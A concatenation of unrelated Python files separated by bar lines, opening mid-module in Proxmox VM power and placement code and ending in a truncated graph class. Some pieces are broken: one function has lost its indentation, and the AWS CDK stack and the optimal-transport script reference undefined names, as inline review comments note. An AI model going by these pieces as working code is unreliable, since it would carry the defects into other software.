    logging.info( 'proxmox: destroying vm "{0}"({1})'.format( vm_name, vm_vmid ) )
    proxmox = _connect( connection_paramaters )
    node, vm = _get_vm( proxmox, vm_vmid )
    if vm is None:
        # already gone, nothing left to do
        return { 'done': True }
    taskid = vm.delete()
    if _taskWait( node, taskid ) != 'OK':
        raise Exception( 'Delete task failed' )
    logging.info( 'proxmox: vm "{0}" destroyed'.format( vm_name ) )
    return { 'done': True }
def get_interface_map( paramaters ):
    """
    Return { 'interface_list': [ mac, ... ] } for the VM, with the MACs
    ordered by interface name ( net0, net1, ... ).  Raises Exception when
    the VM cannot be found.
    """
    connection_paramaters = paramaters[ 'connection' ]
    vm_vmid = paramaters[ 'vmid' ]
    vm_name = paramaters[ 'name' ]
    logging.info( 'proxmox: getting interface map "{0}"({1})'.format( vm_name, vm_vmid ) )
    proxmox = _connect( connection_paramaters )
    _, vm = _get_vm( proxmox, vm_vmid )
    if vm is None:
        raise Exception( 'VM Not Found' )
    interface_map = {}
    for name, value in vm.config.get().items():
        if not name.startswith( 'net' ):
            continue
        # entry looks like 'virtio=A6:EF:6D:0F:F3:7F,bridge=vmbr0,firewall=1';
        # the MAC is the value of the first '='-separated field
        first_field = value.split( ',' )[0]
        _, mac = first_field.split( '=' )
        interface_map[ name ] = mac
    interface_list = [ interface_map[ name ] for name in sorted( interface_map.keys() ) ]
    return { 'interface_list': interface_list }
def _power_state_convert( state ):
if state == 'stopped':
return 'off'
elif state == 'running':
return 'on'
else:
return 'unknown "{0}"'.format( state )
def set_power( paramaters ):
    """
    Drive the VM to the requested power state ( 'on', 'off' or 'soft_off' )
    and return { 'state': <resulting state> }.  Raises Exception for an
    unknown VM, an unknown desired state, or a failed power task.
    """
    connection_paramaters = paramaters[ 'connection' ]
    vm_vmid = paramaters[ 'vmid' ]
    vm_name = paramaters[ 'name' ]
    desired_state = paramaters[ 'state' ]
    logging.info( 'proxmox: setting power state of "{0}"({1}) to "{2}"...'.format( vm_name, vm_vmid, desired_state ) )
    proxmox = _connect( connection_paramaters )
    node, vm = _get_vm( proxmox, vm_vmid )
    if vm is None:
        raise Exception( 'VM Not Found' )
    current_state = _power_state_convert( vm.status.current.get()[ 'status' ] )
    # nothing to do if we are already there ( 'soft_off' counts as 'off' )
    if current_state == desired_state or ( current_state == 'off' and desired_state == 'soft_off' ):
        return { 'state': current_state }
    if desired_state == 'on':
        taskid = vm.status.start.post()
    elif desired_state == 'off':
        taskid = vm.status.stop.post()
    elif desired_state == 'soft_off':
        taskid = vm.status.shutdown.post()
    else:
        raise Exception( 'proxmox desired state "{0}"'.format( desired_state ) )
    rc = _taskWait( node, taskid )
    # a shutdown timeout is tolerated; the final status query reports the truth
    if rc not in ( 'OK', 'VM quit/powerdown failed - got timeout' ):
        logging.debug( 'proxmox: unexpected power control return "{0}"'.format( rc ) )
        raise Exception( 'Power task failed' )
    final_status = vm.status.current.get()
    logging.info( 'proxmox: setting power state of "{0}"({1}) to "{2}" complete'.format( vm_name, vm_vmid, desired_state ) )
    return { 'state': _power_state_convert( final_status[ 'status' ] ) }
def power_state( paramaters ):
    """
    Return { 'state': <power state> } for the VM identified by
    paramaters[ 'vmid' ].  Raises Exception when the VM cannot be found.
    """
    connection_paramaters = paramaters[ 'connection' ]
    vm_vmid = paramaters[ 'vmid' ]
    vm_name = paramaters[ 'name' ]
    logging.info( 'proxmox: getting "{0}"({1}) power state...'.format( vm_name, vm_vmid ) )
    proxmox = _connect( connection_paramaters )
    _, vm = _get_vm( proxmox, vm_vmid )
    if vm is None:
        raise Exception( 'VM Not Found' )
    return { 'state': _power_state_convert( vm.status.current.get()[ 'status' ] ) }
def node_list( paramaters ):
    """
    Score and rank the cluster's online nodes for VM placement.

    A node qualifies only when it has at least paramaters[ 'min_memory' ]
    (MB) free and paramaters[ 'min_cores' ] cpu cores aviable.  Each metric
    is normalized to 0 -> 1 ( 1 most desired ), multiplied by its entry in
    paramaters[ 'scalers' ] and summed; node names are returned best-first
    as { 'node_list': [ ... ] }.
    """
    connection_paramaters = paramaters[ 'connection' ]
    logging.info( 'proxmox: getting Node List' )
    proxmox = _connect( connection_paramaters )
    node_map = {}
    for node in proxmox.nodes.get():
        if node[ 'status' ] != 'online':
            logging.debug( 'proxmox: node "{0}", not online, status: "{1}"'.format( node[ 'node' ], node[ 'status' ] ) )
            continue
        status = proxmox.nodes( node[ 'node' ] ).status.get()
        vm_count = len( proxmox.nodes( node[ 'node' ] ).qemu.get() )
        total_memory = status[ 'memory' ][ 'total' ] / 1024.0 / 1024.0  # bytes -> MB
        memory_aviable = status[ 'memory' ][ 'free' ] / 1024.0 / 1024.0
        if memory_aviable < paramaters[ 'min_memory' ]:
            logging.debug( 'proxmox: host "{0}", low aviable ram: "{1}"'.format( node[ 'node' ], memory_aviable ) )
            continue
        cpu_utilization_aviable = 1.0 - min( 1.0, status[ 'cpu' ] )
        cpu_aviable = cpu_utilization_aviable * status[ 'cpuinfo' ][ 'cpus' ]
        if cpu_aviable < paramaters[ 'min_cores' ]:
            logging.debug( 'proxmox: host "{0}", low aviable cores: "{1}"'.format( node[ 'node' ], cpu_aviable ) )
            continue
        score = paramaters[ 'scalers' ][ 'memory' ] * ( memory_aviable / total_memory )
        score += paramaters[ 'scalers' ][ 'cpu' ] * cpu_utilization_aviable
        score += paramaters[ 'scalers' ][ 'io' ] * ( 1.0 - min( 1.0, status[ 'wait' ] ) )
        # Bug fix: a node with zero VMs used to raise ZeroDivisionError here;
        # treat an empty node as the best possible ( fewest VMs ) score.
        score += paramaters[ 'scalers' ][ 'vm' ] * ( 1.0 / max( vm_count, 1 ) )
        node_map[ node[ 'node' ] ] = score
    logging.debug( 'proxmox: node_map {0}'.format( node_map ) )
    result = sorted( node_map.keys(), key=lambda a: node_map[ a ], reverse=True )
    return { 'node_list': result }
|
from flask import Flask
from flask import render_template
from flask import jsonify
import json
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine
from config import username, password
# Postgresql Database info
database_name = 'michelin_restaurant_db'
connection_string = f'postgresql://{username}:{password}@localhost:5432/{database_name}'
# Connect to the database
engine = create_engine(connection_string)
base = automap_base()
# Reflect the existing tables into automapped ORM classes.
# NOTE(review): the `reflect=True` keyword is the pre-SQLAlchemy-2.0 calling
# convention -- confirm the pinned SQLAlchemy version before upgrading.
base.prepare(engine, reflect=True)
# Tables to use
one_star_restaurants = base.classes.one_star_restaurant
two_star_restaurants = base.classes.two_star_restaurant
three_star_restaurants = base.classes.three_star_restaurant
# Flask setup
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0 # Effectively disables page caching
@app.route('/')
def Index():
    """Serve the landing (about) page."""
    return render_template("about.html")
@app.route('/kiosk')
def Kiosk():
    """Serve the main index page at /kiosk."""
    return render_template("index.html")
@app.route('/cost')
def cost():
    """Serve the radar chart page."""
    return render_template("radar.html")
@app.route('/restaurants')
def Restaurants():
    """
    Return every restaurant (one, two and three star tiers) as a JSON list
    of {name, cuisine, url, starRating, latitude, longitude} objects.
    """
    session = Session(engine)
    try:
        all_restaurants = []
        # The three star tiers live in separate tables with identical columns,
        # so one query loop covers them all.
        for table in (one_star_restaurants, two_star_restaurants, three_star_restaurants):
            results = session.query(table.name,
                                    table.cuisine,
                                    table.url,
                                    table.starRating,
                                    table.latitude,
                                    table.longitude).all()
            all_restaurants.extend(
                {"name": name, "cuisine": cuisine, "url": url,
                 "starRating": starRating, "latitude": latitude,
                 "longitude": longitude}
                for name, cuisine, url, starRating, latitude, longitude in results
            )
    finally:
        # Bug fix: this was `session.close` -- attribute access without the
        # call -- so the session was never closed and connections leaked.
        session.close()
    # Return the jsonified result.
    return jsonify(all_restaurants)
@app.route('/one-star')
def OneStar():
    """
    Return the one-star restaurants as a JSON list of
    {name, cuisine, price, url, latitude, longitude} objects.
    """
    session = Session(engine)
    try:
        results = session.query(one_star_restaurants.name,
                                one_star_restaurants.cuisine,
                                one_star_restaurants.price,
                                one_star_restaurants.url,
                                one_star_restaurants.latitude,
                                one_star_restaurants.longitude).all()
    finally:
        # Bug fix: this was `session.close` (never called); the session now
        # really closes and returns its connection to the pool.
        session.close()
    restaurants = [
        {"name": name, "cuisine": cuisine, "price": price, "url": url,
         "latitude": latitude, "longitude": longitude}
        for name, cuisine, price, url, latitude, longitude in results
    ]
    # Return the jsonified result.
    return jsonify(restaurants)
@app.route('/two-star')
def TwoStar():
    """
    Return the two-star restaurants as a JSON list of
    {name, cuisine, price, url, latitude, longitude} objects.
    """
    session = Session(engine)
    try:
        results = session.query(two_star_restaurants.name,
                                two_star_restaurants.cuisine,
                                two_star_restaurants.price,
                                two_star_restaurants.url,
                                two_star_restaurants.latitude,
                                two_star_restaurants.longitude).all()
    finally:
        # Bug fix: this was `session.close` (never called); the session now
        # really closes and returns its connection to the pool.
        session.close()
    restaurants = [
        {"name": name, "cuisine": cuisine, "price": price, "url": url,
         "latitude": latitude, "longitude": longitude}
        for name, cuisine, price, url, latitude, longitude in results
    ]
    # Return the jsonified result.
    return jsonify(restaurants)
@app.route('/three-star')
def ThreeStar():
    """
    Return the three-star restaurants as a JSON list of
    {name, cuisine, price, url, latitude, longitude} objects.
    """
    session = Session(engine)
    try:
        results = session.query(three_star_restaurants.name,
                                three_star_restaurants.cuisine,
                                three_star_restaurants.price,
                                three_star_restaurants.url,
                                three_star_restaurants.latitude,
                                three_star_restaurants.longitude).all()
    finally:
        # Bug fix: this was `session.close` (never called); the session now
        # really closes and returns its connection to the pool.
        session.close()
    restaurants = [
        {"name": name, "cuisine": cuisine, "price": price, "url": url,
         "latitude": latitude, "longitude": longitude}
        for name, cuisine, price, url, latitude, longitude in results
    ]
    # Return the jsonified result.
    return jsonify(restaurants)
if __name__ == '__main__':
    # debug=True enables the Werkzeug reloader/debugger; disable for production.
    app.run(debug=True)
# Read a number of minutes from stdin, wrap it to a single day (1440 minutes),
# and print the equivalent "hours minutes" pair.
total = int(input()) % 1440
hours, minutes = divmod(total, 60)
print(hours, minutes)
from game.items import NormalLog
from game.models.model import Tree
from game.skills import SkillTypes
class CommonTree(Tree):
    # The entry-level tree: a single hit point, harvestable from skill level 1.
    name = 'Common Tree'
    health = 1
    # XP awarded per skill when harvested.
    xp = {SkillTypes.woodcutting: 25}
    # Minimum skill levels required.
    # NOTE(review): the firemaking requirement presumably relates to using the
    # logs afterwards -- confirm against how Tree interprets skill_requirement.
    skill_requirement = {SkillTypes.woodcutting: 1, SkillTypes.firemaking: 1}
    # Item type produced when the tree is harvested.
    resource = NormalLog
|
#coding:utf-8
from django.db import models
from django.contrib.auth.models import User,AnonymousUser
# Create your models here.
# class Application(models.Model):
# user = models.ForeignKey(User)
# name = models.CharField( max_length=100 ,null=True)
# description = models.CharField( max_length= 1000,null=True)
#
# class Module(models.Model):
# app = models.ForeignKey(Application)
# name = models.CharField( max_length=100 ,null=True)
# description = models.CharField( max_length= 1000,null=True)
#
# class ApiDoc(models.Model):
# """
#
# """
# class Meta:
# unique_together = ()
# GET = 'get'
# POST = 'post'
# PUT = 'put'
# DELETE = 'delete'
#
# CHOICE_METHOD =(
# (GET,GET),
# (POST,POST),
# (PUT,PUT),
# (DELETE,DELETE)
# )
#
#
#
#
# app = models.ForeignKey(Application)
# module = models.ForeignKey(Module,null=True)
#
# doc_id = models.CharField( max_length= 40 )
# name = models.CharField( max_length=100 ,null=True)
# description = models.CharField( max_length= 1000,null=True)
# url = models.CharField(max_length= 200)
# method = models.CharField(max_length=20,default=GET,choices=CHOICE_METHOD)
#
# UTF8 = 'utf-8'
# CHOICE_CHAR_ENCODING =(
# (UTF8,UTF8),
# )
#
# CONTENT_TYPE_X_FORM = 'x-www-form-urlencoded'
# CONTENT_TYPE_JSON = 'json'
# CONTENT_TYPE_XML = 'xml'
# CONTENT_TYPE_YAML = 'yaml'
#
# CHOICE_CONTENT_TYPE=(
# (CONTENT_TYPE_X_FORM,CONTENT_TYPE_X_FORM),
# (CONTENT_TYPE_JSON,CONTENT_TYPE_JSON),
# (CONTENT_TYPE_XML,CONTENT_TYPE_XML),
# (CONTENT_TYPE_YAML,CONTENT_TYPE_YAML)
# )
#
#
# class Body(models.Model):
# doc = models.ForeignKey(ApiDoc)
# char_encoding = models.CharField(max_length=40,choices=CHOICE_CHAR_ENCODING,default=UTF8)
# content_type = models.CharField(max_length=60,choices=CHOICE_CONTENT_TYPE,default=CONTENT_TYPE_X_FORM)
#
# # errors = models.ManyToManyField(ErrorDef)
# class Parameter(models.Model):
# INT = 'int'
# STRING = 'string'
# BOOL = 'bool'
# CHOICE_VALUE_TYPE=(
# (INT,INT),
# (STRING,STRING),
# (BOOL,BOOL)
# )
# doc = models.ForeignKey(ApiDoc)
# name = models.CharField(max_length=40)
# description = models.CharField(max_length=200,null=True)
# value_type = models.CharField(max_length=40,choices=CHOICE_VALUE_TYPE,default=STRING)
#
#
# class ErrorDef(models.Model):
# # app = models.ForeignKey(Application)
# doc = models.ForeignKey(ApiDoc)
# code = models.CharField(max_length=20,db_index=True,verbose_name=u'错误编码')
# message = models.CharField(max_length=200,null=True)
|
"""
This is a setup.py script generated by py2applet
Usage:
python setup.py py2app
"""
from setuptools import setup
# py2app entry-point script, relative to this setup.py's directory.
APP = ['../main.py']
# Non-code resources bundled into the application alongside the executable.
DATA_FILES = ['../Resources/SolarFarmDiagram.bmp','../Resources/currencyList.txt','../Resources/help.html']
# argv_emulation off: the app does not need Finder drag-and-drop argv events.
OPTIONS = {'argv_emulation': False}
setup(
    name="Solar Farm Calculator",
    version="v0.1",
    app=APP,
    data_files=DATA_FILES,
    options={'py2app': OPTIONS},
    setup_requires=['py2app'],
)
|
from dotenv import dotenv_values
from aws_cdk import (
core,
)
from collections import OrderedDict
from .common_resources import CommonResourceStack
from .stage_resources import StageResourceStack
from .app_pipeline import AppPipelineStack
class BackstageStack(core.Stack):
    """
    Root CDK stack: provisions the shared resources, the app build/deploy
    pipeline, and one resource stack plus pipeline deploy stage per entry
    in `stages`.
    """

    def __init__(self, scope: core.Construct, construct_id: str, props: dict, stages: dict, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        crs = CommonResourceStack(self, "infra-common-resources", props)
        pipeline = AppPipelineStack(self, 'backstage-app-pipeline', props, crs)
        # Add one deploy stage to the pipeline per configured stage.
        for name, stage in stages.items():
            # Pipeline-only settings -- keep them out of the ECS container env.
            approval = stage.pop('STAGE_APPROVAL', False)
            emails = stage.pop('APPROVAL_EMAILS', None)
            # Stage-specific values override the shared props.
            props = {**props, **stage}
            srs = StageResourceStack(self, name, props, crs)
            # ECS deploy stage for this stage's service, plus an optional approval gate.
            pipeline.add_deploy_stage(name, srs.ecs_stack.service, approval, emails)

        # ------------------------------------------------------------------
        # NOTE(review): everything below references names that are never
        # imported or defined in this module (codepipeline, actions,
        # codebuild, iam, github_token_secret, github_org, github_repo,
        # build_spec, docker_asset, ecs_stack) and would raise NameError if
        # reached.  It appears to be leftover code duplicated from the
        # pipeline stack -- confirm and either delete it or wire up the
        # missing imports and values.
        # ------------------------------------------------------------------
        # Intent: a codepipeline that sources the backstage app repo, docker
        # builds and pushes a new image to ECR, then redeploys ECS, so that a
        # commit to the app repo is all that is needed to deploy an update.
        source_output = codepipeline.Artifact()
        build_output = codepipeline.Artifact()
        # source stage: the backstage app GitHub repository
        source_action = actions.GitHubSourceAction(
            oauth_token=github_token_secret.secret_value_from_json("secret"),
            owner=github_org,
            repo=github_repo,
            branch='main',
            action_name="Github-Source",
            output=source_output
        )
        # build stage: codebuild uses the buildspec (env vars from .env) to
        # build and push the new image to the ECR repo
        build_project = codebuild.PipelineProject(
            self,
            "CodebuildProject",
            build_spec=codebuild.BuildSpec.from_object(build_spec),
            #build_spec=codebuild.BuildSpec.from_source_filename('buildspec.yml'),
            environment=codebuild.BuildEnvironment(build_image=codebuild.LinuxBuildImage.STANDARD_4_0, privileged=True),
        )
        policy = iam.ManagedPolicy.from_aws_managed_policy_name("AmazonEC2ContainerRegistryPowerUser")
        build_project.role.add_managed_policy(policy)
        # the buildspec.yaml lives in the backstage app repo
        repo_uri = docker_asset.repository.repository_uri
        build_action = actions.CodeBuildAction(
            action_name="Docker-Build",
            project=build_project,
            input=source_output,
            outputs=[build_output],
            environment_variables={
                "REPOSITORY_URI": codebuild.BuildEnvironmentVariable(value=repo_uri),
                "AWS_REGION": codebuild.BuildEnvironmentVariable(value=props.get("AWS_REGION")),
                "CONTAINER_NAME": codebuild.BuildEnvironmentVariable(value=props.get("CONTAINER_NAME"))
            },
        )
        # deploy stage: update the service from the image definition file
        # produced by the build stage
        deploy_action = actions.EcsDeployAction(
            service=ecs_stack.service,
            action_name="ECS-Deploy",
            input=build_output,
        )
        pipeline = codepipeline.Pipeline(self, "fccbackstagepipeline", cross_account_keys=False)
        pipeline.add_stage(stage_name="Source", actions=[source_action])
        pipeline.add_stage(stage_name="Build", actions=[build_action])
        pipeline.add_stage(stage_name="Deploy", actions=[deploy_action])
import requests
import os
import time
import json
# TODO: parse the JSON response with the json module instead of printing raw text
file = "D:/locked.csv"
i = 0  # number of ids actually unlocked
# Read all ids up front so the file handle is closed before the slow network loop.
with open(file) as file_line:
    all_lines = file_line.readlines()
for num in all_lines:
    # Bug fix: the original combined the checks with bitwise `&` and called
    # isdigit() on the raw line (trailing newline included), so digit lines
    # were never matched.  Strip first, then test.
    num = num.strip()
    if not num.isdigit():
        continue
    print("开始解锁ID = " + num)
    i += 1
    url = "https://utc.365sale.com/wenzhou/consumer/rest/v11/promoters/" + num + "/unlock"
    print("发送请求 " + url)
    headers = {'Content-Type': 'application/json'}
    r = requests.put(url, headers=headers)
    print(r.text)
    print("id " + num + " 已解锁")
    print("请稍等。。。\n")
    time.sleep(3)  # wait 3s between requests so we do not DoS the server
print("解锁处理完成 " + str(i))  # must be str, not int
|
class Value:
    """Abstract base class for interpreter values."""
    pass


class Integer(Value):
    """A boxed integer constant."""

    def __init__(self, value):
        self.value = value

    def __repr__(self):
        return '<Integer %d>' % (self.value,)


class String(Value):
    """A boxed string constant."""

    def __init__(self, value):
        self.value = value

    def __repr__(self):
        return '<String %r>' % (self.value,)


class Application(Value):
    """A binary operator application: operation(op1, op2)."""

    def __init__(self, operation, op1, op2):
        self.operation = operation
        self.op1 = op1
        self.op2 = op2

    def __repr__(self):
        return '<Application %s(%s, %s)>' % (self.operation, self.op1, self.op2)
|
import numpy as np
import ot
import matplotlib.pyplot as plt
import scipy
# 2D Wasserstein-barycenter experiment: compare barycenters computed with an
# image-aware (2-D coordinate) cost matrix vs a flat 1-D (vector) cost matrix.
# 2D
n = 100 # nb bins
# bin positions
x = np.arange(n, dtype=np.float64)
# a1 = np.ones((n,20)) * 0.001 # m= mean, s= std
# a2 = np.ones((n,20)) * 0.001
# a1[10:20] = 1
# a2[60:70] = 1
# arti = np.vstack((a1.reshape(1,2000), a2.reshape(1,2000)))
# # signal is in the middle of image
# a1 = np.ones((n,20)) * 0.001
# a2 = np.ones((n,20)) * 0.001
# a1[10:20,7:13] = 1
# a2[60:70,7:13] = 1
# arti = np.vstack((a1.reshape(1,2000), a2.reshape(1,2000)))
#signal is not in the middle of image
a1 = np.ones((n,20)) * 0.001
a2 = np.ones((n,20)) * 0.001
a1[10:20,3:9] = 1
a2[80:90,11:17] = 1
arti = np.vstack((a1.reshape(1,2000), a2.reshape(1,2000)))
# # artificial data
# # arti_data = scipy.io.loadmat('/home/qiwang/Downloads/artificial_data.mat')
# arti_data = scipy.io.loadmat('/hpc/crise/wang.q/data/artificial_data.mat')
# arti = arti_data['x']
# # arti = np.vstack((arti[1][:,18:26].reshape((1,480)),arti[42][:,18:26].reshape((1,480))))
# a1 = arti[0]
# a2 = arti[50]
# arti = np.vstack((a1.reshape(1,5400), a2.reshape(1,5400)))
# Shift each flattened image to be non-negative and normalize it into a
# probability distribution (required by the OT barycenter solver).
arti_dis = np.empty(arti.shape)
for i in range(arti.shape[0]):
    data = arti[i] - np.min(arti[i])
    data /= np.sum(data)
    arti_dis[i] = data
# A holds one distribution per column, as ot.bregman.barycenter expects.
A = np.transpose(arti_dis)
# arti = np.transpose(arti)
alpha = 1/A.shape[1] # 0<=alpha<=1
# uniform barycenter weights over the input distributions
weights = np.ones(A.shape[1]) * alpha
# bary_l2 = A.dot(weights)
reg = 1/800
# M with 2d coordinates
nx, ny = a1.shape
x = np.linspace(0,1,nx)
y = np.linspace(0, 1, ny)
xv, yv = np.meshgrid(y,x)
coors = np.vstack((xv.flatten(), yv.flatten())).T
# swap columns so coordinates are (row, col) order
coor = np.empty(coors.shape)
coor[:,0] = coors[:,1]
coor[:,1] = coors[:,0]
M_image = ot.utils.dist(coor)
N = 1
# M = np.sqrt(M)
# normalize the cost matrix; N rescales the normalization
M_image /= np.max(M_image) * N
bary_wass_image, log = ot.bregman.barycenter(A, M_image, reg, weights,
                                 numItermax=100, log=True)
# 1-D cost matrix that ignores the 2-D image layout, for comparison
M_vector = ot.utils.dist0(A.shape[0])
# M = np.sqrt(M)
N = 1
M_vector /= np.max(M_vector) * N
bary_wass_vector, log = ot.bregman.barycenter(A, M_vector, reg, weights,
                                 numItermax=100, log=True)
plt.figure()
plt.subplot(1,4,1)
plt.imshow(a1)
plt.title('image 1')
plt.subplot(1,4,2)
plt.imshow(a2)
plt.title('image 2')
plt.subplot(1,4,3)
plt.imshow(bary_wass_vector.reshape(a1.shape))
plt.title('barycenter with \nvector distance matrix')
plt.subplot(1,4,4)
plt.imshow(bary_wass_image.reshape(a1.shape))
plt.title('barycenter with \nimage distance matrix')
# different weights for M_image
M_image = ot.utils.dist(coor)
Ns = [0.1, 0.2, 0.5, 1, 5]
plt.figure()
plt.subplot(1, 7, 1)
plt.imshow(a1)
plt.title('image 1')
plt.subplot(1, 7, 2)
plt.imshow(a2)
plt.title('image 2')
for i in range(len(Ns)):
    N = Ns[i]
    # M = np.sqrt(M)
    M_image1 = M_image / (np.max(M_image) * N)
    bary_wass_image1, log = ot.bregman.barycenter(A, M_image1, reg, weights,
                                 numItermax=100, log=True)
    plt.subplot(1, 7, i + 3)
    plt.imshow(bary_wass_image1.reshape(a1.shape))
    plt.title('barycenter\n{}'.format(N))
# steps in algorithm
# NOTE(review): `M` is undefined at this point (only M_image, M_vector and
# M_image1 exist above), so this line raises NameError when run -- M_image
# (or the last M_image1) was presumably intended.  Confirm before fixing.
K = np.exp(-M / reg)
K[K<1e-300] = 1e-300
UKv = np.dot(K, np.divide(A.T, np.sum(K, axis=0)).T)
u = (ot.bregman.geometricMean(UKv) / UKv.T).T
# UKv = u * np.dot(K, np.divide(A, np.dot(K, u)))
# u = (u.T * ot.bregman.geometricBar(weights, UKv)).T / UKv
barycenter = ot.bregman.geometricBar(weights, UKv)
plt.figure()
plt.subplot(1,6,1)
# NOTE(review): `M` again -- same undefined name as above.
plt.imshow(M)
plt.title(N)
plt.subplot(1,6,2)
plt.imshow(K)
plt.subplot(1,6,3)
for i in range(A.shape[1]):
    plt.plot(x, A[:, i])
plt.title('A, 2d')
plt.subplot(1,6,4)
for i in range(UKv.shape[1]):
    plt.plot(x, UKv[:, i])
plt.title('UKv, 2d')
plt.subplot(1,6,5)
plt.plot(x, barycenter)
plt.title('bary_wass, 2d')
plt.subplot(1,6,6)
for i in range(u.shape[1]):
    plt.plot(x, u[:,i])
plt.title('u, 2d')
|
#!/usr/bin/env python
"""
The documentation for the framework
"""
import cherrypy
from cherrypy import expose
from WMCore.WebTools.Page import TemplatedPage
from os import path
from cherrypy import HTTPError
from cherrypy.lib.static import serve_file
def serveFile(contentType, prefix, *args):
    """
    Serve the file at prefix/args with the given content type, refusing any
    path that resolves outside `prefix` (403) or does not exist (404).
    """
    name = path.normpath(path.join(prefix, *args))
    # Security fix: path.commonprefix() compares strings character by
    # character, so a sibling directory such as "<prefix>2" used to pass the
    # old check.  Require `name` to be the prefix itself or to live below a
    # real path-separator boundary under it.
    if name != prefix and not name.startswith(prefix + path.sep):
        raise HTTPError(403)
    if not path.exists(name):
        raise HTTPError(404, "Page not found")
    return serve_file(name, content_type = contentType)
class WMBSMonitorPage(TemplatedPage):
    """
    Web monitor for WMBS: serves the static documentation pages and assets,
    plus the templated status pages for subscriptions and jobs.
    """
    @expose
    @cherrypy.tools.secmodv2()
    def index(self):
        """Serve the top-level WMBS index page."""
        return serveFile('text/html', self.config.html, 'WMBS', 'index.html')

    @expose
    @cherrypy.tools.secmodv2()
    def default(self, *args):
        """Serve the named documentation page, or the index when no path is given."""
        if not args:
            return self.index()
        return serveFile('text/html',
                         path.join(self.config.html, 'WMBS'), *args)

    @expose
    @cherrypy.tools.secmodv2()
    def javascript(self, *args):
        """Serve javascript assets; 'external' paths come from the JS root."""
        if args[0] == "external":
            return serveFile('application/javascript',
                             path.join(self.config.javascript), *args)
        return serveFile('application/javascript',
                         path.join(self.config.javascript,
                                   'WMCore', 'WebTools'), *args)

    @expose
    @cherrypy.tools.secmodv2()
    def css(self, *args):
        """Serve css assets; 'external' paths come from the CSS root."""
        if args[0] == "external":
            return serveFile('text/css',
                             self.config.css, *args)
        return serveFile('text/css',
                         path.join(self.config.css,
                                   'WMCore', 'WebTools'), *args)

    @expose
    @cherrypy.tools.secmodv2()
    def template(self, *args, **kwargs):
        """Render the named template, or fall back to the index page."""
        if not args:
            # make not found page
            return self.index()
        return self.templatepage(args[0], **kwargs)

    @expose
    @cherrypy.tools.secmodv2()
    def wmbsStatus(self, subscriptionType = "All"):
        """
        Render the main monitoring page showing the status of all WMBS
        subscriptions, optionally filtered by subscription type
        (default "All").
        """
        return self.templatepage("WMBS", subType = subscriptionType,
                                 instance = "WMBS")

    @expose
    @cherrypy.tools.secmodv2()
    def subscriptionStatus(self, subscriptionId):
        """Render the status page for the subscription with the given id."""
        return self.templatepage("WMBSSubscription",
                                 subscriptionId = int(subscriptionId))

    @expose
    @cherrypy.tools.secmodv2()
    def jobStatus(self, jobState = "success", interval = 7200):
        """
        Render the job status page for `jobState` over the last `interval`
        seconds (defaults: 'success', 2 hours).  The template also receives
        the WMBS instance name and the couch URL used to show job documents.
        """
        return self.templatepage("WMBSJobStatus", jobState = jobState,
                                 interval = int(interval),
                                 instance = self.config.instance,
                                 couchURL = self.config.couchURL)
|
# Mood computer
# Demonstrates the elif clause of the if statement
# (user-facing strings are in Polish and left untouched)
import random
print("Wyczuwam Twoją energię użytkowniku. Twoje prawdziwe emocje znajdują odbiie na moim ekranie.")
print("Jesteś...")
# pick one of three moods at random
mood = random.randint(1,3)
if mood == 1:
    # happy
    print(
"""
-----------
| |
| O O |
| < |
| |
| . . |
| `...` |
-----------
""")
elif mood == 2:
    # indifferent
    print(
"""
-----------
| |
| O O |
| < |
| |
| ------ |
| |
-----------
""")
elif mood == 3:
    # sad
    print(
"""
-----------
| |
| O O |
| < |
| |
| .'. |
| ' ' |
-----------
""")
else:
    # unreachable: randint(1,3) only yields 1-3; kept as a defensive fallback
    print("Nieprawidłowa wartość nastroju! (musisz być naprawdę w złym humorze.")
print("...dzisiaj.")
input("\n\nAby zakończyć program kliknj Enter.")
|
from typing import *
import numpy as np
import pandas as pd
import scipy.stats as stats
from scipy import sparse as sp
import torch
class Graph(object):
    """An undirected graph with canonically ordered edges (src <= dst) and an
    optional scalar flow value per edge.

    Edge position lookups are accelerated by ``_indexed_edge``, a pandas
    Series mapping the scalar key ``src * num_nodes + dst`` to the edge's
    row index in ``edges``.
    """
    def __init__(self, num_nodes: int, edges: np.ndarray, flow: np.ndarray = None):
        """
        :param num_nodes: number of nodes; all edge endpoints must be < num_nodes.
        :param edges: (num_edges, 2) int array of (src, dst) pairs with src <= dst.
        :param flow: optional (num_edges,) array of per-edge flow values.
        """
        self._verify(num_nodes, edges, flow)
        self._num_nodes = num_nodes
        self.edges = edges.astype(np.int64)
        self._flow = flow
        # Node degrees: count occurrences of each node over both endpoint columns.
        self._degrees = np.zeros(num_nodes)
        nodes, degree = np.unique(np.concatenate((self.edges[:, 0], self.edges[:, 1])), return_counts=True)
        self._degrees[nodes] = degree
        if flow is not None:
            # Re-run set_flow so the flow is validated and cast to float32.
            self.set_flow(flow)
        # Maps the scalar edge key (src * num_nodes + dst) to the edge row index.
        self._indexed_edge = pd.Series(data=range(len(self.edges)), index=self._edges2index(self.edges))
    def set_flow(self, flow: np.ndarray):
        """Attach a per-edge flow vector (stored as float32)."""
        assert len(flow) == self.num_edges
        self._flow = flow.astype(np.float32)
    @staticmethod
    def _verify(num_nodes, edges, flow):
        # Sanity checks: endpoints in range and edges canonically ordered (src <= dst).
        if len(edges) == 0:
            return
        assert edges.max() < num_nodes
        assert (edges[:, 0] <= edges[:, 1]).all()
    @classmethod
    def read_csv(cls, path):
        """Load a graph from CSV: first line is '#<num_nodes>', then src,dst,flow rows."""
        with open(path, 'r') as fp:
            num_nodes_line = fp.readline()
            num_nodes = int(num_nodes_line.strip("#\n"))
            df = pd.read_csv(fp, names=["src", "dst", "flow"],
                             dtype={"src": np.int64, "dst": np.int64, "flow": np.float64})
            # An all-null flow column means the file stored no flow values.
            flow = None if df.loc[:, "flow"].isnull().all() else df.loc[:, "flow"].to_numpy()
            return cls(num_nodes, edges=df.loc[:, ["src", "dst"]].to_numpy(), flow=flow)
    def to_csv(self, path):
        """Write the graph in the format understood by :meth:`read_csv`."""
        with open(path, 'w') as fp:
            fp.write("#" + str(self.num_nodes) + "\n")
            pd.DataFrame(
                {"src": self.edges[:, 0], "dst": self.edges[:, 1], "flow": self.flow}
            ).to_csv(fp, mode='a', header=False, index=False)
    @property
    def degrees(self):
        # Per-node degree vector (undirected: both endpoints count).
        return self._degrees
    @property
    def src_nodes(self):
        # First endpoint column of every edge.
        return self.edges[:, 0]
    @property
